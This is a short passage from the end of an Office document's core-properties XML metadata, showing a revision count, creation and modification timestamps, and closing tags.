  <cp:revision>639</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2003-12-02T08:17:12Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2009-08-20T18:44:42Z</dcterms:modified>
</cp:coreProperties>
</file>